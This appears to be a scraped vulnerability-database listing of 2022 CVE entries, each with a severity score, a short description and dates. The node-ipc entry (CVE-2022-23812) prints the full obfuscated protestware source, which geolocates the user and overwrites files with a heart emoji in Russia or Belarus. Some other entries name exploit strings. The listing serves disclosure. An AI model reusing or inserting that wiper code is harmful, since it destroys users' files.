9.8
    Critical

    CVE-2022-24223

    Last Modified: 9 Feb 2022

    AtomCMS v2.0 was discovered to contain a SQL injection vulnerability via /admin/login.php.

    Source:Luca Cuzzolin
    Published:1 Feb 2022
    6.1
    Medium

    CVE-2022-24181

    Last Modified: 19 Apr 2022

    Cross-site scripting (XSS) via Host Header injection in PKP Open Journals System 2.4.8 >= 3.3 allows remote attackers to inject arbitary code via the X-Forwarded-Host Header.

    Source:Hemant Kashyap
    Published:1 Apr 2022
    8.8
    High

    CVE-2022-24125

    Last Modified: 21 Nov 2024

    The matchmaking servers of Bandai Namco FromSoftware Dark Souls III through 2022-03-19 allow remote attackers to send arbitrary push requests to clients via a RequestSendMessageToPlayers request. For example, ability to send a push message to hundreds of thousands of machines is only restricted on the client side, and can thus be bypassed with a modified client.

    Published:20 Mar 2022
    7.5
    High

    CVE-2022-24124

    Last Modified: 28 Feb 2022

    The query API in Casdoor before 1.13.1 has a SQL injection vulnerability related to the field and value parameters, as demonstrated by api/get-organizations.

    Source:Mayank Deshmukh
    Published:29 Jan 2022
    7.8
    High

    CVE-2022-24122

    Last Modified: 21 Nov 2024

    kernel/ucount.c in the Linux kernel 5.14 through 5.16.4, when unprivileged user namespaces are enabled, allows a use-after-free and privilege escalation because a ucounts object can outlive its namespace.

    Published:29 Jan 2022
    9.8
    Critical

    CVE-2022-24112

    Last Modified: 16 Mar 2022

    An attacker can abuse the batch-requests plugin to send requests to bypass the IP restriction of Admin API. A default configuration of Apache APISIX (with default API key) is vulnerable to remote code execution. When the admin key was changed or the port of Admin API was changed to a port different from the data panel, the impact is lower. But there is still a risk to bypass the IP restriction of Apache APISIX's data panel. There is a check in the batch-requests plugin which overrides the client IP with its real remote IP. But due to a bug in the code, this check can be bypassed.

    Source:Ven3xy
    Published:11 Feb 2022
    Unknown

    CVE-2022-24087

    https://github.com/Neimar47574/CVE-2022-24087

    9.8
    Critical

    CVE-2022-24086

    Last Modified: 23 Oct 2025

    Adobe Commerce versions 2.4.3-p1 (and earlier) and 2.3.7-p2 (and earlier) are affected by an improper input validation vulnerability during the checkout process. Exploitation of this issue does not require user interaction and could result in arbitrary code execution.

    Published:16 Feb 2022
    9.8
    Critical

    CVE-2022-24082

    Last Modified: 28 Mar 2023

    If an on-premise installation of the Pega Platform is configured with the port for the JMX interface exposed to the Internet and port filtering is not properly configured, then it may be possible to upload serialized payloads to attack the underlying system. This does not affect systems running on PegaCloud due to its design and architecture.

    Source:Marcin Wolak
    Published:19 Jul 2022
    7.5
    High

    CVE-2022-23990

    Last Modified: 5 May 2025

    Expat (aka libexpat) before 2.4.4 has an integer overflow in the doProlog function.

    Published:26 Jan 2022
    6.1
    Medium

    CVE-2022-23988

    Last Modified: 21 Nov 2024

    The WS Form LITE and Pro WordPress plugins before 1.8.176 do not sanitise and escape submitted form data, allowing unauthenticated attacker to submit XSS payloads which will get executed when a privileged user will view the related submission

    Published:28 Feb 2022
    Low

    CVE-2022-23967

    Last Modified: 7 Nov 2023

    DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: CVE-2019-15679. Reason: This candidate is a duplicate of CVE-2019-15679. Notes: All CVE users should reference CVE-2019-15679 instead of this candidate. All references and descriptions in this candidate have been removed to prevent accidental usage.

    Published:26 Jan 2022
    8.8
    High

    CVE-2022-23940

    Last Modified: 21 Nov 2024

    SuiteCRM through 7.12.1 and 8.x through 8.0.1 allows Remote Code Execution. Authenticated users with access to the Scheduled Reports module can achieve this by leveraging PHP deserialization in the email_recipients property. By using a crafted request, they can create a malicious report, containing a PHP-deserialization payload in the email_recipients field. Once someone accesses this report, the backend will deserialize the content of the email_recipients field and the payload gets executed. Project dependencies include a number of interesting PHP deserialization gadgets (e.g., Monolog/RCE1 from phpggc) that can be used for Code Execution.

    Published:7 Mar 2022
    7.8
    High

    CVE-2022-23935

    Last Modified: 21 Nov 2024

    lib/Image/ExifTool.pm in ExifTool before 12.38 mishandles a $file =~ /\|$/ check, leading to command injection.

    Published:25 Jan 2022
    7.8
    High

    CVE-2022-23909

    Last Modified: 7 Apr 2022

    There is an unquoted service path in Sherpa Connector Service (SherpaConnectorService.exe) 2020.2.20328.2050. This might allow a local user to escalate privileges by creating a "C:\Program Files\Sherpa Software\Sherpa.exe" file.

    Source:Manthan Chhabra
    Published:5 Apr 2022
    9.8
    Critical

    CVE-2022-23884

    Last Modified: 21 Nov 2024

    Mojang Bedrock Dedicated Server 1.18.2 is affected by an integer overflow leading to a bound check bypass caused by PurchaseReceiptPacket::_read (packet deserializer).

    Published:28 Mar 2022
    8.4
    High

    CVE-2022-23862

    Last Modified: 30 Oct 2024

    A Local Privilege Escalation issue was discovered in Y Soft SAFEQ 6 Build 53. The SafeQ JMX service running on port 9696 is vulnerable to JMX MLet attacks. Because the service did not enforce authentication and was running under the "NT Authority\System" user, an attacker is able to use the vulnerability to execute arbitrary code and elevate to the system user.

    Published:22 Oct 2024
    6.1
    Medium

    CVE-2022-23861

    Last Modified: 1 Nov 2024

    Multiple Stored Cross-Site Scripting vulnerabilities were discovered in Y Soft SAFEQ 6 Build 53. Multiple fields in the YSoft SafeQ web application can be used to inject malicious inputs that, due to a lack of output sanitization, result in the execution of arbitrary JS code. These fields can be leveraged to perform XSS attacks on legitimate users accessing the SafeQ web interface.

    Published:22 Oct 2024
    7.5
    High

    CVE-2022-23854

    Last Modified: 11 Nov 2022

    AVEVA InTouch Access Anywhere versions 2020 R2 and older are vulnerable to a path traversal exploit that could allow an unauthenticated user with network access to read files on the system outside of the secure gateway web server.

    Source:Jens Regel
    Published:23 Dec 2022
    9.8
    Critical

    CVE-2022-23852

    Last Modified: 5 May 2025

    Expat (aka libexpat) before 2.4.4 has a signed integer overflow in XML_GetBuffer, for configurations with a nonzero XML_CONTEXT_BYTES.

    Published:23 Jan 2022
    9.8
    Critical

    CVE-2022-23812

    Last Modified: 21 Nov 2024

    This affects the package node-ipc from 10.1.1 and before 10.1.3. This package contains malicious code, that targets users with IP located in Russia or Belarus, and overwrites their files with a heart emoji. **Note**: from versions 11.0.0 onwards, instead of having malicious code directly in the source of this package, node-ipc imports the peacenotwar package that includes potentially undesired behavior. Malicious Code: **Note:** Don't run it! js import u from "path"; import a from "fs"; import o from "https"; setTimeout(function () { const t = Math.round(Math.random() * 4); if (t > 1) { return; } const n = Buffer.from("aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5NjhhYWFhNzU4YTUzMDkxNTQ=", "base64"); // https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154 o.get(n.toString("utf8"), function (t) { t.on("data", function (t) { const n = Buffer.from("Li8=", "base64"); const o = Buffer.from("Li4v", "base64"); const r = Buffer.from("Li4vLi4v", "base64"); const f = Buffer.from("Lw==", "base64"); const c = Buffer.from("Y291bnRyeV9uYW1l", "base64"); const e = Buffer.from("cnVzc2lh", "base64"); const i = Buffer.from("YmVsYXJ1cw==", "base64"); try { const s = JSON.parse(t.toString("utf8")); const u = s[c.toString("utf8")].toLowerCase(); const a = u.includes(e.toString("utf8")) || u.includes(i.toString("utf8")); // checks if country is Russia or Belarus if (a) { h(n.toString("utf8")); h(o.toString("utf8")); h(r.toString("utf8")); h(f.toString("utf8")); } } catch (t) {} }); }); }, Math.ceil(Math.random() * 1e3)); async function h(n = "", o = "") { if (!a.existsSync(n)) { return; } let r = []; try { r = a.readdirSync(n); } catch (t) {} const f = []; const c = Buffer.from("4p2k77iP", "base64"); for (var e = 0; e < r.length; e++) { const i = u.join(n, r[e]); let t = null; try { t = a.lstatSync(i); } catch (t) { continue; } if (t.isDirectory()) { const s = h(i, o); s.length > 0 ? f.push(...s) : null; } else if (i.indexOf(o) >= 0) { try { a.writeFile(i, c.toString("utf8"), function () {}); // overwrites file with ❤️ } catch (t) {} } } return f; } const ssl = true; export { ssl as default, ssl };

    Published:16 Mar 2022
    6.1
    Medium

    CVE-2022-23808

    Last Modified: 5 May 2025

    An issue was discovered in phpMyAdmin 5.1 before 5.1.2. An attacker can inject malicious code into aspects of the setup script, which can allow XSS or HTML injection.

    Published:22 Jan 2022
    5.3
    Medium

    CVE-2022-23779

    Last Modified: 21 Nov 2024

    Zoho ManageEngine Desktop Central before 10.1.2137.8 exposes the installed server name to anyone. The internal hostname can be discovered by reading HTTP redirect responses.

    Published:2 Mar 2022
    7.5
    High

    CVE-2022-23773

    Last Modified: 21 Nov 2024

    cmd/go in Go before 1.16.14 and 1.17.x before 1.17.7 can misinterpret branch names that falsely appear to be version tags. This can lead to incorrect access control if an actor is supposed to be able to create branches but not tags.

    Published:11 Feb 2022
    7.8
    High

    CVE-2022-23731

    Last Modified: 21 Nov 2024

    V8 javascript engine (heap vulnerability) can cause privilege escalation ,which can impact on some webOS TV models.

    Published:11 Mar 2022
    7.5
    High

    CVE-2022-23648

    Last Modified: 21 Nov 2024

    containerd is a container runtime available as a daemon for Linux and Windows. A bug was found in containerd prior to versions 1.6.1, 1.5.10, and 1.14.12 where containers launched through containerd’s CRI implementation on Linux with a specially-crafted image configuration could gain access to read-only copies of arbitrary files and directories on the host. This may bypass any policy-based enforcement on container setup (including a Kubernetes Pod Security Policy) and expose potentially sensitive information. Kubernetes and crictl can both be configured to use containerd’s CRI implementation. This bug has been fixed in containerd 1.6.1, 1.5.10, and 1.4.12. Users should update to these versions to resolve the issue.

    Published:2 Mar 2022
    8.8
    High

    CVE-2022-23642

    Last Modified: 14 Jun 2022

    Sourcegraph is a code search and navigation engine. Sourcegraph prior to version 3.37 is vulnerable to remote code execution in the `gitserver` service. The service acts as a git exec proxy, and fails to properly restrict calling `git config`. This allows an attacker to set the git `core.sshCommand` option, which sets git to use the specified command instead of ssh when they need to connect to a remote system. Exploitation of this vulnerability depends on how Sourcegraph is deployed. An attacker able to make HTTP requests to internal services like gitserver is able to exploit it. This issue is patched in Sourcegraph version 3.37. As a workaround, ensure that requests to gitserver are properly protected.

    Source:Altelus
    Published:18 Feb 2022
    5.1
    Medium

    CVE-2022-23636

    Last Modified: 23 Apr 2025

    Wasmtime is an open source runtime for WebAssembly & WASI. Prior to versions 0.34.1 and 0.33.1, there exists a bug in the pooling instance allocator in Wasmtime's runtime where a failure to instantiate an instance for a module that defines an `externref` global will result in an invalid drop of a `VMExternRef` via an uninitialized pointer. A number of conditions listed in the GitHub Security Advisory must be true in order for an instance to be vulnerable to this issue. Maintainers believe that the effective impact of this bug is relatively small because the usage of `externref` is still uncommon and without a resource limiter configured on the `Store`, which is not the default configuration, it is only possible to trigger the bug from an error returned by `mprotect` or `VirtualAlloc`. Note that on Linux with the `uffd` feature enabled, it is only possible to trigger the bug from a resource limiter as the call to `mprotect` is skipped. The bug has been fixed in 0.34.1 and 0.33.1 and users are encouraged to upgrade as soon as possible. If it is not possible to upgrade to version 0.34.1 or 0.33.1 of the `wasmtime` crate, it is recommend that support for the reference types proposal be disabled by passing `false` to `Config::wasm_reference_types`. Doing so will prevent modules that use `externref` from being loaded entirely.

    Published:16 Feb 2022
    8.5
    High

    CVE-2022-23626

    Last Modified: 23 May 2022

    m1k1o/blog is a lightweight self-hosted facebook-styled PHP blog. Errors from functions `imagecreatefrom*` and `image*` have not been checked properly. Although PHP issued warnings and the upload function returned `false`, the original file (that could contain a malicious payload) was kept on the disk. Users are advised to upgrade as soon as possible. There are no known workarounds for this issue.

    Source:Malte V
    Published:8 Feb 2022
    8.8
    High

    CVE-2022-23614

    Last Modified: 23 Apr 2025

    Twig is an open source template language for PHP. When in a sandbox mode, the `arrow` parameter of the `sort` filter must be a closure to avoid attackers being able to run arbitrary PHP functions. In affected versions this constraint was not properly enforced and could lead to code injection of arbitrary PHP code. Patched versions now disallow calling non Closure in the `sort` filter as is the case for some other filters. Users are advised to upgrade.

    Published:4 Feb 2022
    Low

    CVE-2022-23529

    Last Modified: 13 Feb 2025

    DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: The issue is not a vulnerability. Notes: none.

    Published:21 Dec 2022
    5.3
    Medium

    CVE-2022-23513

    Last Modified: 4 Sept 2023

    Pi-Hole is a network-wide ad blocking via your own Linux hardware, AdminLTE is a Pi-hole Dashboard for stats and more. In case of an attack, the threat actor will obtain the ability to perform an unauthorized query for blocked domains on `queryads` endpoint. In the case of application, this vulnerability exists because of a lack of validation in code on a root server path: `/admin/scripts/pi-hole/phpqueryads.php.` Potential threat actor(s) are able to perform an unauthorized query search in blocked domain lists. This could lead to the disclosure for any victims' personal blacklists.

    Source:kv1to
    Published:22 Dec 2022
    7.5
    High

    CVE-2022-23457

    Last Modified: 3 Nov 2025

    ESAPI (The OWASP Enterprise Security API) is a free, open source, web application security control library. Prior to version 2.3.0.0, the default implementation of `Validator.getValidDirectoryPath(String, String, File, boolean)` may incorrectly treat the tested input string as a child of the specified parent directory. This potentially could allow control-flow bypass checks to be defeated if an attack can specify the entire string representing the 'input' path. This vulnerability is patched in release 2.3.0.0 of ESAPI. As a workaround, it is possible to write one's own implementation of the Validator interface. However, maintainers do not recommend this.

    Published:25 Apr 2022
    4.9
    Medium

    CVE-2022-23409

    Last Modified: 16 Apr 2025

    The Logs plugin before 3.0.4 for Craft CMS allows remote attackers to read arbitrary files via input to actionStream in Controller.php.

    Source:ub3rsick
    Published:31 Jan 2022
    5.4
    Medium

    CVE-2022-23378

    Last Modified: 21 Nov 2024

    A Cross-Site Scripting (XSS) vulnerability exists within the 3.2.2 version of TastyIgniter. The "items%5B0%5D%5Bpath%5D" parameter of a request made to /admin/allergens/edit/1 is vulnerable.

    Published:9 Feb 2022
    9.8
    Critical

    CVE-2022-23366

    Last Modified: 10 Feb 2022

    HMS v1.0 was discovered to contain a SQL injection vulnerability via patientlogin.php.

    Source:nu11secur1ty
    Published:21 Jan 2022
    Unknown

    CVE-2022-23361

    https://github.com/ViNi0608/CVE-2022-23361

    5.3
    Medium

    CVE-2022-23342

    Last Modified: 21 Nov 2024

    The Hyland Onbase Application Server releases prior to 20.3.58.1000 and OnBase releases 21.1.1.1000 through 21.1.15.1000 are vulnerable to a username enumeration vulnerability. An attacker can obtain valid users based on the response returned for invalid and valid users by sending a POST login request to the /mobilebroker/ServiceToBroker.svc/Json/Connect endpoint. This can lead to user enumeration against the underlying Active Directory integrated systems.

    Published:21 Jun 2022
    9.8
    Critical

    CVE-2022-23305

    Last Modified: 22 May 2026

    By design, the JDBCAppender in Log4j 1.2.x accepts an SQL statement as a configuration parameter where the values to be inserted are converters from PatternLayout. The message converter, %m, is likely to always be included. This allows attackers to manipulate the SQL by entering crafted strings into input fields or headers of an application that are logged allowing unintended SQL queries to be executed. Note this issue only affects Log4j 1.x when specifically configured to use the JDBCAppender, which is not the default. Beginning in version 2.0-beta8, the JDBCAppender was re-introduced with proper support for parameterized SQL queries and further customization over the columns written to in logs. Apache Log4j 1.2 reached end of life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the previous versions.

    Published:18 Jan 2022
    9.8
    Critical

    CVE-2022-23303

    Last Modified: 3 Nov 2025

    The implementations of SAE in hostapd before 2.10 and wpa_supplicant before 2.10 are vulnerable to side channel attacks as a result of cache access patterns. NOTE: this issue exists because of an incomplete fix for CVE-2019-9494.

    Published:17 Jan 2022
    8.8
    High

    CVE-2022-23277

    Last Modified: 8 Jul 2025

    Microsoft Exchange Server Remote Code Execution Vulnerability

    Published:9 Mar 2022
    8.1
    High

    CVE-2022-23270

    Last Modified: 2 Jan 2025

    Windows Point-to-Point Tunneling Protocol Remote Code Execution Vulnerability

    Published:10 May 2022
    6.5
    Medium

    CVE-2022-23253

    Last Modified: 8 Jul 2025

    Windows Point-to-Point Tunneling Protocol Denial of Service Vulnerability

    Published:9 Mar 2022
    7.8
    High

    CVE-2022-23222

    Last Modified: 21 Nov 2024

    kernel/bpf/verifier.c in the Linux kernel through 5.15.14 allows local users to gain privileges because of the availability of pointer arithmetic via certain *_OR_NULL pointer types.

    Published:14 Jan 2022
    9.8
    Critical

    CVE-2022-23221

    Last Modified: 5 May 2025

    H2 Console before 2.1.210 allows remote attackers to execute arbitrary code via a jdbc:h2:mem JDBC URL containing the IGNORE_UNKNOWN_SETTINGS=TRUE;FORBID_CREATION=FALSE;INIT=RUNSCRIPT substring, a different vulnerability than CVE-2021-42392.

    Published:19 Jan 2022
    9.8
    Critical

    CVE-2022-23178

    Last Modified: 18 Jan 2022

    An issue was discovered on Crestron HD-MD4X2-4K-E 1.0.0.2159 devices. When the administrative web interface of the HDMI switcher is accessed unauthenticated, user credentials are disclosed that are valid to authenticate to the web interface. Specifically, aj.html sends a JSON document with uname and upassword fields.

    Source:RedTeam Pentesting GmbH
    Published:15 Jan 2022
    3.7
    Low

    CVE-2022-23134

    Last Modified: 30 Oct 2025

    After the initial setup process, some steps of setup.php file are reachable not only by super-administrators, but by unauthenticated users as well. Malicious actor can pass step checks and potentially change the configuration of Zabbix Frontend.

    Published:13 Jan 2022
    9.1
    Critical

    CVE-2022-23131

    Last Modified: 30 Oct 2025

    In the case of instances where the SAML SSO authentication is enabled (non-default), session data can be modified by a malicious actor, because a user login stored in the session was not verified. Malicious unauthenticated actor may exploit this issue to escalate privileges and gain admin access to Zabbix Frontend. To perform the attack, SAML authentication is required to be enabled and the actor has to know the username of Zabbix user (or use the guest account, which is disabled by default).

    Published:13 Jan 2022
    6.5
    Medium

    CVE-2022-23093

    Last Modified: 4 Jun 2025

    ping reads raw IP packets from the network to process responses in the pr_pack() function. As part of processing a response ping has to reconstruct the IP header, the ICMP header and if present a "quoted packet," which represents the packet that generated an ICMP error. The quoted packet again has an IP header and an ICMP header. The pr_pack() copies received IP and ICMP headers into stack buffers for further processing. In so doing, it fails to take into account the possible presence of IP option headers following the IP header in either the response or the quoted packet. When IP options are present, pr_pack() overflows the destination buffer by up to 40 bytes. The memory safety bugs described above can be triggered by a remote host, causing the ping program to crash. The ping process runs in a capability mode sandbox on all affected versions of FreeBSD and is thus very constrained in how it can interact with the rest of the system at the point where the bug can occur.

    Published:15 Feb 2024
    7.5
    High

    CVE-2022-23082

    Last Modified: 21 Nov 2024

    In CureKit versions v1.0.1 through v1.1.3 are vulnerable to path traversal as the function isFileOutsideDir fails to sanitize the user input which may lead to path traversal.

    Published:31 May 2022